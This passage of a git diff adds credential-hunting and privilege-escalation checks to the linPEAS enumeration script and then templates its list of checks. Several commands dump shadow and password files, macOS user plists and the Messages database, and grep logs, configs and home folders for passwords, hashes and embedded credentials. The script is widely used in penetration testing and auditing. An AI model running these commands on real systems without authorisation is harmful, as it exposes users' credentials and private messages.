[ "$IAMROOT" ] && [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi +fi +echo "" + +##-- IF) Hashes in passwd file +print_list "Hashes inside passwd file? ........... " +if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +##-- IF) Writable in passwd file +print_list "Writable passwd file? ................ " +if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," +elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," +elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," +else echo_no +fi + +##-- IF) Credentials in fstab +print_list "Credentials in fstab/mtab? ........... " +if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +##-- IF) Read shadow files +print_list "Can I read shadow files? ............. 
" +if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +print_list "Can I read shadow plists? ............ " +possible_check="" +(for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no + +print_list "Can I write shadow plists? ........... " +possible_check="" +(for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no + +##-- IF) Read opasswd file +print_list "Can I read opasswd file? ............. " +if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" +else echo_no +fi + +##-- IF) network-scripts +print_list "Can I write in network-scripts? ...... " +if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," +elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," +else echo_no +fi + +##-- IF) Read root dir +print_list "Can I read root folder? .............. 
" +(ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no +echo "" + +##-- IF) Root files in home dirs +print_2title "Searching root files in home dirs (limit 30)" +(find $HOMESEARCH /Users -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found +echo "" + +##-- IF) Others files in my dirs +if ! [ "$IAMROOT" ]; then + print_2title "Searching folders owned by me containing others files on it (limit 100)" + (find / -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" + echo "" +fi + +##-- IF) Readable files belonging to root and not world readable +if ! [ "$IAMROOT" ]; then + print_2title "Readable files belonging to root and readable by me but not world readable" + (find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found + echo "" +fi + +##-- IF) Modified interesting files into specific folders in the last 5mins +print_2title "Modified interesting files in the last 5mins (limit 100)" +find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! 
-path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," +echo "" + +##-- IF) Writable log files +print_2title "Writable log files (logrotten) (limit 100)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation" +logrotate --version 2>/dev/null || echo_not_found "logrotate" +lastWlogFolder="ImPOsSiBleeElastWlogFolder" +logfind=$(find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100) +printf "%s\n" "$logfind" | while read log; do + if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found + if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; + elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case + elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; + elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! 
"$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; + fi + fi +done + +echo "" + +##-- IF) Files inside my home +print_2title "Files inside $HOME (limit 20)" +(ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found +echo "" + +##-- IF) Files inside /home +print_2title "Files inside others home (limit 20)" +(find $HOMESEARCH /Users -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found +echo "" + +##-- IF) Mail applications +print_2title "Searching installed mail applications" +ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" +echo "" + +##-- IF) Mails +print_2title "Mails (limit 50)" +(find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_GREEN},g") || echo_not_found +echo "" + +##-- IF) Backup folders +print_2title "Backup folders" +printf "%s\n" "$backup_folders" | while read b ; do + ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; + ls -l "$b" 2>/dev/null && echo "" +done +echo "" + +##-- IF) Backup files +print_2title "Backup files (limited 100)" +backs=$(find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null) +printf "%s\n" "$backs" | head -n 100 | while read b ; do + if [ -r "$b" ]; then + ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g"; + fi; +done +echo "" + +##-- IF) DB files +if [ "$MACPEAS" ]; then + print_2title "Reading messages database" + sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null + sqlite3 
$HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null + sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null + +fi +print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" +FILECMD="$(command -v file 2>/dev/null)" +if [ "$PSTORAGE_DATABASE" ]; then + printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do + if [ "$FILECMD" ]; then + echo "Found: $(file $f)" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + else + echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + fi + done + SQLITEPYTHON="" + echo "" + printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do + if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd + printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC + if [ "$(command -v sqlite3 2>/dev/null)" ]; then + tables=$(sqlite3 $f ".tables" 2>/dev/null) + #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" + elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then + SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null) + tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null) + #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" + else + tables="" + fi + if [ "$tables" ]; then + printf "%s\n" "$tables" | while read t; do + columns="" + # Search for credentials inside the table using sqlite3 + if [ -z "$SQLITEPYTHON" ]; then + columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE") + # Search for credentials inside the table using python + else + columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM 
sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null) + fi + #Check found columns for interesting fields + INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt") + if [ "$INTCOLUMN" ]; then + printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" + printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g" + (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head + fi + done + echo "" + fi + fi + done +fi +echo "" + +if [ "$MACPEAS" ]; then + print_2title "Downloaded Files" + sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|" +fi + +##-- IF) Web files +print_2title "Web files?(output limit)" +ls -alhR /var/www/ 2>/dev/null | head +ls -alhR /srv/www/htdocs/ 2>/dev/null | head +ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head +ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head +echo "" + +##-- IF) All hidden files +print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" +find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! 
-path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70 +echo "" + +##-- IF) Readable files in /tmp, /var/tmp, bachups +print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" +filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70) +printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done +echo "" + +##-- IF) Interesting writable files by ownership or all +if ! [ "$IAMROOT" ]; then + print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" + #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all + obmowbe=$(find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) + printf "%s\n" "$obmowbe" | while read entry; do + if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; + elif echo "$entry" | grep -qE "$writeVB"; then + echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," + else + echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," + fi + done + echo "" +fi + +##-- IF) Interesting writable files by group +if ! 
[ "$IAMROOT" ]; then + print_2title "Interesting GROUP writable files (not in Home) (max 500)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" + for g in $(groups); do + printf " Group $GREEN$g:\n$NC"; + iwfbg=$(find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) + printf "%s\n" "$iwfbg" | while read entry; do + if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; + elif echo "$entry" | grep -Eq "$writeVB"; then + echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," + else + echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," + fi + done + done + echo "" +fi + +##-- IF) Passwords in config PHP files +print_2title "Searching passwords in config PHP files" +printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done +echo "" + +##-- IF) TTY passwords +print_2title "Checking for TTY (sudo/su) passwords in audit logs" +aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" +find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" +echo "" + +##-- IF) IPs inside logs +print_2title "Finding IPs inside logs (limit 70)" +(find /var/log/ /private/var/log -type f -exec grep -R -a -E -o 
"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70 +echo "" + +##-- IF) Passwords inside logs +print_2title "Finding passwords inside logs (limit 70)" +(find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," +echo "" + +##-- IF) Emails inside logs +print_2title "Finding emails inside logs (limit 70)" +(find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g" +echo "" + +##-- IF) Passwords files in home +print_2title "Finding *password* or *credential* files in home (limit 70)" +(printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found +echo "" + +if ! 
[ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then + ##-- IF) Find possible files with passwords + print_2title "Finding passwords inside key folders (limit 70) - only PHP files" + intpwdfiles=$(timeout 150 grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$HOMESEARCH" /var/www /usr/local/www/ "$backup_folders_row" /tmp /etc /root /mnt /Users /private 2>/dev/null) + printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" + echo "" + + print_2title "Finding passwords inside key folders (limit 70) - no PHP files" + printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" + echo "" + + ##-- IF) Find possible files with passwords + print_2title "Finding possible password variables inside key folders (limit 140)" + timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" + 
timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" + echo "" + + ##-- IF) Find possible conf files with passwords + print_2title "Finding possible password in config files" + ppicf=$(find "$HOMESEARCH" /etc /root /tmp /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null) + printf "%s\n" "$ppicf" | while read f; do + if grep -qEiI 'passwd.*|creden.*' \"$f\" 2>/dev/null; then + echo "$ITALIC $f$NC" + grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g" + fi + done + echo "" + + ##-- IF) Find possible files with usernames + print_2title "Finding 'username' string inside key folders (limit 70)" + timeout 150 grep -RiIE "username.*[=:].+" "$HOMESEARCH" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" + timeout 150 grep -RiIE "username.*[=:].+" /var/www "$backup_folders_row" /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v 
"#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" + echo "" + + ##-- IF) Specific hashes inside files + print_2title "Searching specific hashes inside files - less false positives (limit 70)" + regexblowfish='\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*' + regexjoomlavbulletin='[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}' + regexphpbb3='\$H\$[a-zA-Z0-9_/\.]{31}' + regexwp='\$P\$[a-zA-Z0-9_/\.]{31}' + regexdrupal='\$S\$[a-zA-Z0-9_/\.]{52}' + regexlinuxmd5='\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' + regexapr1md5='\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' + regexsha512crypt='\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}' + regexapachesha='\{SHA\}[0-9a-zA-Z/_=]{10,}' + timeout 150 grep -RIEHo "$regexblowfish|$regexjoomlavbulletin|$regexphpbb3|$regexwp|$regexdrupal|$regexlinuxmd5|$regexapr1md5|$regexsha512crypt|$regexapachesha" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | head -n 70 | sed "s,:.*,${SED_RED}," + echo "" +fi + +if ! [ "$FAST" ] && ! 
[ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then + ##-- IF) Specific hashes inside files + print_2title "Searching md5/sha1/sha256/sha512 hashes inside files (limit 50 - only 1 per file)" + regexmd5='(^|[^a-zA-Z0-9])[a-fA-F0-9]{32}([^a-zA-Z0-9]|$)' + regexsha1='(^|[^a-zA-Z0-9])[a-fA-F0-9]{40}([^a-zA-Z0-9]|$)' + regexsha256='(^|[^a-zA-Z0-9])[a-fA-F0-9]{64}([^a-zA-Z0-9]|$)' + regexsha512='(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)' + timeout 150 grep -RIEHo "$regexmd5|$regexsha1|$regexsha256|$regexsha512" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 2){ print line_init; } if (cont == "2"){print " #)There are more hashes files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 50 | sed "s,:.*,${SED_RED}," | sed "s,There are more hashes files in the previous parent folder,${C}[3m&${C}[0m," + echo "" +fi + +if ! [ "$SUPERFAST" ] && ! 
[ "$FAST" ]; then
+ ##-- IF) Find URIs with user:password@hoststrings
+ print_2title "Finding URIs with user:password@host inside key folders"
+ timeout 150 find /var/www "$backup_folders_row" /tmp /etc /var/log /private/var/log -type f -exec grep -RiIE "://(.+):(.+)@" "{}" \; 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g"
+ timeout 150 grep -RiIE "://(.+):(.+)@" "$HOMESEARCH" 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g"
+ timeout 150 grep -RiIE "://(.+):(.+)@" /mnt 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g"
+ timeout 150 grep -RiIE "://(.+):(.+)@" /root 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g"
+ timeout 150 grep -RiIE "://(.+):(.+)@" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g"
+ timeout 150 grep -RiIE "://(.+):(.+)@" /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g"
+ timeout 150 grep -RiIE "://(.+):(.+)@" /Applications 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g"
+ echo ""
+fi
\ No newline at end of file
diff --git a/linPEAS/builder/linpeas_base.sh b/linPEAS/builder/linpeas_parts/linpeas_base.sh
similarity index 56%
rename from linPEAS/builder/linpeas_base.sh
rename to linPEAS/builder/linpeas_parts/linpeas_base.sh
index 06abb7d..df6fc85 100755
--- a/linPEAS/builder/linpeas_base.sh
+++ b/linPEAS/builder/linpeas_parts/linpeas_base.sh
@@ -56,7 +56,7 @@ NOTEXPORT=""
 DISCOVERY=""
 PORTS=""
 QUIET=""
-CHECKS="SysI,Container,Devs,AvaSof,ProCronSrvcsTmrsSocks,Net,UsrI,SofI,IntFiles"
+CHECKS="peass{CHECKS}"
 WAIT=""
 PASSWORD=""
 NOCOLOR=""
@@ -77,7 +77,7 @@ ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user,
 ${YELLOW}-N${BLUE} Do not use colours
 ${YELLOW}-v${BLUE} Verbose execution
 ${YELLOW}-P${BLUE} Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su'
- ${YELLOW}-o${BLUE} Only execute selected checks (SysI, Container, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles). Select a comma separated list.
+ ${YELLOW}-o${BLUE} Only execute selected checks (peass{CHECKS}). Select a comma separated list.
 ${YELLOW}-L${BLUE} Force linpeas execution.
 ${YELLOW}-M${BLUE} Force macpeas execution.
 ${YELLOW}-d ${BLUE} Discover hosts using fping or ping.$DG Ex: -d 192.168.0.1/24
